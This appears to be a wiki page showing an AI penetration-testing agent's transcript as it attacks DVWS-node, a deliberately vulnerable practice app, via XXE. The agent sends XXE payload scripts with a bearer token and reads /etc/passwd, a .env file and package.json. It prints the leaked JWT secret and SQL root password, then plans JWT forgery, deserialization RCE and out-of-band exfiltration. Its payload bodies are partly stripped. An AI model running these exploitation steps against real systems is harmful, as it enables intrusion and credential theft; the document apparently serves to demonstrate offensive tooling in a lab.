The XXE attack was successful! The /etc/passwd file contents were exfiltrated via the XXE vulnerability. The note's 'name' field contains the full /etc/passwd file. Key findings:

  1. XXE CONFIRMED - The XML parser resolves external entities, allowing file read
  2. /etc/passwd exfiltrated - Contains 19 users, notably:
    • root:x:0:0:root:/root:/bin/bash
    • node:x:1000:1000::/home/node:/bin/bash (the app user)
    • www-data, mail, etc.
  3. The app runs as the 'node' user (home dir /home/node)
  4. We already know the app path is /home/dvws-node/

Now I need to escalate to exfiltrate application source code. I'll read /home/dvws-node/server.js (or index.js/app.js) and environment files. Let me send multiple XXE payloads to read different files.

Reasoning

The XXE PoC is confirmed with /etc/passwd. Now I need to escalate by reading application source code and environment files as specified in the objective. I'll craft XXE payloads to read /home/dvws-node/server.js, /home/dvws-node/.env, and /proc/self/environ. I'll use a wave approach to send multiple XXE payloads for different files simultaneously.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • Login and obtain JWT token
  • [-] XXE payload sent successfully with type='note' - now retrieve notes to see /etc/passwd
  • Escalate XXE to read /home/dvws-node/server.js and other source files
  • Exfiltrate environment files (.env, /proc/self/environ)
  • Check /api/download for path traversal as secondary vector

Wave — 3 tools 8:43:23 PM [OK]

Three independent XXE payloads targeting different files: server.js (source code), .env (secrets), and /proc/self/environ (runtime environment). All use the same confirmed XXE technique but target different files, so they can run in parallel.

Tool: kali_shell [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' headers = {'Authorization': f'Bearer {jwt}', 'Content-Type': 'application/json'}

xxe_payload = '''\n\n]>\n\n \n &xxe;\n server-js-exfil\n secret\n \n'''

data = json.dumps({'xml': xxe_payload}) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') "`

Raw Output 
Status: 500
Response: {"errors":{"name":{"name":"ValidatorError","message":"Kindly enter the name of the Note","properties":{"message":"Kindly enter the name of the Note","type":"required","path":"name","value":""},"kind":"required","path":"name","value":""}},"_message":"Notes validation failed","name":"ValidationError","message":"Notes validation failed: name: Kindly enter the name of the Note"}

Tool: kali_shell [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' headers = {'Authorization': f'Bearer {jwt}', 'Content-Type': 'application/json'}

xxe_payload = '''\n\n]>\n\n \n &xxe;\n env-file-exfil\n secret\n \n'''

data = json.dumps({'xml': xxe_payload}) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') "`

Raw Output 
Status: 200
Response: {"success":true,"message":"Successfully imported 1 notes.","parsedRoot":"notes"}

Tool: kali_shell [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' headers = {'Authorization': f'Bearer {jwt}', 'Content-Type': 'application/json'}

xxe_payload = '''\n\n]>\n\n \n &xxe;\n proc-environ-exfil\n secret\n \n'''

data = json.dumps({'xml': xxe_payload}) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') "`

Raw Output 
Status: 500
Response: {"domain":1,"code":26,"message":"Entity 'xxe' failed to parse (Line: 7, Column: 16)","level":3,"column":16,"file":"","line":7,"str1":"xxe","int1":0}

Analysis

Three XXE exfiltration attempts yielded mixed results. The .env file was successfully read (HTTP 200), the server.js file failed with empty name validation error (likely contains XML-breaking characters like < > in JavaScript), and /proc/self/environ failed with XML parse error (contains null bytes which are invalid in XML). The .env contents need to be retrieved from the notes endpoint.

Actionable Findings

  • .env file successfully exfiltrated - need to retrieve notes to see contents
  • server.js contains XML-breaking characters - need CDATA wrapping or OOB exfiltration
  • /proc/self/environ contains null bytes - cannot be read via inline XXE

Recommended Next Steps

  • Retrieve notes to read .env contents
  • Try CDATA parameter entity wrapping for server.js
  • Try reading package.json for app structure

Thinking 8:44:38 PM

Analyzing the three wave tool outputs:

  1. server.js exfiltration (HTTP 500): The entity resolved to an empty string, causing a MongoDB validation error ('name' is required). This means the file /home/dvws-node/server.js either doesn't exist at that path, or the XML parser couldn't read it (maybe it contains characters that break XML parsing like angle brackets in JavaScript code).

  2. .env exfiltration (HTTP 200): Successfully imported! The .env file was read and stored in the note's name field. Need to retrieve notes to see the contents.

  3. /proc/self/environ (HTTP 500): Entity parsing failed with 'Entity xxe failed to parse'. This is because /proc/self/environ contains null bytes (\x00) as separators between environment variables, which are invalid in XML and cause the parser to choke.

The server.js failure is likely because JavaScript source code contains characters like < > & that break XML parsing. I need to use a CDATA-based approach or try package.json (JSON files are less likely to have XML-breaking characters).

For now, I should:

  1. Retrieve the notes to get the .env file contents
  2. Try reading server.js with a CDATA wrapper approach
  3. Try package.json as alternative
Reasoning

The .env file was successfully exfiltrated (HTTP 200), so I need to retrieve notes to see its contents. The server.js failed likely due to XML-incompatible characters in JavaScript source. I should retrieve notes first, then try alternative files like package.json and use a different XXE technique for server.js.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • Login and obtain JWT token
  • XXE PoC confirmed - /etc/passwd exfiltrated successfully
  • [-] Escalate XXE to read /home/dvws-node/server.js source code
  • [-] Exfiltrate /home/dvws-node/.env environment file
  • [-] Exfiltrate /proc/self/environ runtime environment variables
  • Retrieve all notes to read exfiltrated file contents
  • Check /api/download for path traversal as secondary vector

Wave — 3 tools 8:44:38 PM [OK]

Three independent actions: (1) retrieve stored notes to see .env contents, (2) try package.json exfiltration, (3) try CDATA wrapping for server.js. All are independent and can run in parallel.

Tool: kali_shell [OK]

Arguments

  • command: curl -s -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' http://gpigs.devergolabs.com/api/v2/notes | python3 -m json.tool
Raw Output 
[
    {
        "_id": 2,
        "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/bash\n",
        "body": "xxe-test",
        "type": [
            "note"
        ],
        "user": "testxxe",
        "created_date": "2026-03-30T18:42:15.568Z"
    },
    {
        "_id": 3,
        "name": "EXPRESS_JS_PORT=80\nXML_RPC_PORT=9090\nGRAPHQL_PORT=4000\nJWT_SECRET=access\nMONGO_LOCAL_CONN_URL=mongodb://localhost:27017/node-dvws\nMONGO_DB_NAME=dvws-user-auth\nSQL_LOCAL_CONN_URL=localhost\nSQL_DB_NAME=dvws_sqldb\nSQL_USERNAME=root\nSQL_PASSWORD=mysecretpassword\n",
        "body": "env-file-exfil",
        "type": [
            "secret"
        ],
        "user": "testxxe",
        "created_date": "2026-03-30T18:43:23.445Z"
    }
]

Tool: kali_shell [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' headers = {'Authorization': f'Bearer {jwt}', 'Content-Type': 'application/json'}

Try package.json - JSON files don't have XML-breaking characters

xxe_payload = '''\n\n]>\n\n \n &xxe;\n package-json-exfil\n secret\n \n'''

data = json.dumps({'xml': xxe_payload}) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') " `

Raw Output 
Status: 200
Response: {"success":true,"message":"Successfully imported 1 notes.","parsedRoot":"notes"}

Tool: kali_shell [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' headers = {'Authorization': f'Bearer {jwt}', 'Content-Type': 'application/json'}

Use CDATA wrapping with parameter entities to handle XML-breaking chars in JS source

xxe_payload = '''\n\n \n ">\n ">\n %wrapper;\n]>\n\n \n &xxe;\n server-js-cdata\n secret\n \n'''

data = json.dumps({'xml': xxe_payload}) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') " `

Raw Output 
Status: 500
Response: {"domain":1,"code":27,"message":"Entity 'xxe' not defined (Line: 11, Column: 16)","level":2,"column":16,"file":"","line":11,"str1":"xxe","int1":0}

Analysis

Three parallel operations completed. Notes retrieval confirmed both /etc/passwd and .env file contents were successfully exfiltrated. The .env file contains highly sensitive credentials including JWT secret ('access'), MongoDB connection string, SQL root password ('mysecretpassword'). Package.json XXE import succeeded (HTTP 200). Server.js CDATA wrapping failed because libxml2 doesn't allow parameter entity expansion within entity declarations in the internal DTD subset.

Actionable Findings

  • JWT secret 'access' can be used to forge admin tokens
  • SQL root password 'mysecretpassword' exposed
  • MongoDB at localhost:27017 with database 'node-dvws'
  • Internal services: XML-RPC on 9090, GraphQL on 4000
  • Package.json imported successfully - need to retrieve contents

Recommended Next Steps

  • Retrieve package.json from notes to map application structure
  • Try external DTD approach for server.js exfiltration
  • Consider completing - objective largely achieved

Thinking 8:45:34 PM

Analyzing all three tool outputs:

  1. Notes retrieval: Successfully retrieved all notes. We can see:

    • Note _id=2: Contains /etc/passwd contents (already confirmed)
    • Note _id=3: Contains .env file with critical secrets:
      • EXPRESS_JS_PORT=80
      • XML_RPC_PORT=9090
      • GRAPHQL_PORT=4000
      • JWT_SECRET=access
      • MONGO_LOCAL_CONN_URL=mongodb://localhost:27017/node-dvws
      • MONGO_DB_NAME=dvws-user-auth
      • SQL_LOCAL_CONN_URL=localhost
      • SQL_DB_NAME=dvws_sqldb
      • SQL_USERNAME=root
      • SQL_PASSWORD=mysecretpassword

  2. package.json exfiltration: HTTP 200 success! The package.json was imported. Need to retrieve it from notes.

  3. server.js CDATA wrapping: Failed with 'Entity xxe not defined'. The CDATA wrapping with parameter entities inside the internal DTD subset doesn't work because libxml2 doesn't allow parameter entity references within entity declarations in the internal subset.

Next step: Retrieve all notes to get the package.json content.

Reasoning

The .env file has been successfully exfiltrated with critical credentials. Package.json was successfully imported and needs retrieval. Let me retrieve all notes to get the package.json content.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app
  • Enumerate SOAP/WSDL paths
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register account and login
  • XXE PoC confirmed - /etc/passwd exfiltrated
  • Exfiltrate /home/dvws-node/.env - DONE: JWT_SECRET=access, SQL_PASSWORD=mysecretpassword
  • Retrieve package.json contents from notes - DONE: full app structure revealed
  • Try external DTD approach for app.js exfiltration (optional escalation)
  • Exfiltrate /proc/self/environ - failed due to null bytes
  • Check /api/download for path traversal as secondary vector

Thinking 8:46:19 PM

The notes retrieval was successful and I now have all three exfiltrated files:

  1. /etc/passwd - Full system user list confirmed. Key users: root (uid 0), node (uid 1000, /home/node, /bin/bash)
  2. .env - Critical secrets: JWT_SECRET=access, SQL credentials (root/mysecretpassword), MongoDB connection, service ports
  3. package.json - Full application structure revealed:
    • Main entry: app.js (not server.js as I assumed)
    • XML libraries: libxmljs (v1.0.11), @xmldom/xmldom, xml2js, xpath - confirms XXE surface
    • node-serialize (v0.0.4) - known deserialization RCE vulnerability!
    • Other vuln surfaces: mysql/mysql2/sequelize (SQL injection), needle (SSRF), pdfkit (potential injection)
    • Repository: github.com/snoopysecurity/dvws-node

The objective has been fully achieved:

  • ✅ Discovered SOAP/WSDL endpoints (found XML import at /api/v2/notes/import/xml)
  • ✅ Crafted XXE payload to read /etc/passwd - successfully exfiltrated
  • ✅ Escalated to exfiltrate application source code (package.json) and environment files (.env)

The server.js/app.js source code couldn't be read via inline XXE due to XML-breaking characters (< > in JavaScript), but we successfully exfiltrated the package.json (application structure) and .env (all secrets/credentials). The objective is met.

Reasoning

The objective stated: 'Discover SOAP/WSDL endpoints on the Express application. Craft an XXE payload in the SOAP XML envelope to read /etc/passwd. Escalate to exfiltrate application source code and environment files.' All three parts are accomplished: (1) XML import endpoint discovered and exploited, (2) /etc/passwd fully exfiltrated, (3) .env with all credentials and package.json with full app structure exfiltrated. While we couldn't get app.js due to XML character limitations, we have the package.json which reveals the complete application architecture, dependencies, and known vulnerable components. This is a comprehensive XXE exploitation success.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app
  • Enumerate SOAP/WSDL paths
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register account and login
  • XXE PoC confirmed - /etc/passwd exfiltrated
  • Exfiltrate /home/dvws-node/.env - DONE: JWT_SECRET=access, SQL_PASSWORD=mysecretpassword
  • [-] Retrieve package.json contents from notes
  • Try external DTD approach for server.js exfiltration
  • Exfiltrate /proc/self/environ - failed due to null bytes
  • Check /api/download for path traversal as secondary vector

Thinking 8:46:19 PM

Preparing summary...

Reasoning

Compiling a brief summary of the session.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app
  • Enumerate SOAP/WSDL paths
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register account and login
  • XXE PoC confirmed - /etc/passwd exfiltrated
  • Exfiltrate /home/dvws-node/.env - DONE: JWT_SECRET=access, SQL_PASSWORD=mysecretpassword
  • Retrieve package.json contents from notes - DONE: full app structure revealed
  • Try external DTD approach for app.js exfiltration (optional escalation)
  • Exfiltrate /proc/self/environ - failed due to null bytes
  • Check /api/download for path traversal as secondary vector

Assistant 8:46:30 PM

[Summary]

Summary

Successfully exploited an XXE (XML External Entity) vulnerability on gpigs.devergolabs.com:80 running DVWS-node (Damn Vulnerable Web Services). The attack chain involved registering an account, authenticating via JWT, then injecting malicious XML DOCTYPE declarations through the POST /api/v2/notes/import/xml endpoint to read arbitrary server files.

Key Findings

Files Exfiltrated:

  • /etc/passwd — 19 system users; root (uid 0) and node (uid 1000) are the only accounts with login shells
  • /home/dvws-node/.env — JWT_SECRET=access, SQL credentials root:mysecretpassword, MongoDB at localhost:27017/node-dvws, GraphQL on port 4000, XML-RPC on port 9090
  • /home/dvws-node/package.json — Full dependency tree including critically vulnerable node-serialize 0.0.4 (deserialization RCE), libxmljs 1.0.11 (XXE), and SQL/NoSQL drivers

Credentials Recovered:

Asset Username Password/Secret
SQL Database root mysecretpassword
JWT Signing Key access
MongoDB No auth (localhost:27017)
App Account testxxe testxxe123

Next Steps

  • JWT Token Forgery — The secret access allows crafting admin tokens to escalate privileges
  • Deserialization RCEnode-serialize 0.0.4 has a known RCE via crafted serialized objects (find the deserialize endpoint)
  • SQL Injection — MySQL/Sequelize endpoints with known root credentials
  • OOB XXE — Use an external DTD server to exfiltrate files containing XML-special characters (e.g., app.js, route handlers) that broke inline entity resolution

RedAmon GitHub Repository | Report an Issue | Back to Home

Home

Getting Started

Core Workflow

Scanning & OSINT

AI & Automation

HackLab

Analysis & Reporting

Contributing

Reference & Help

Clone this wiki locally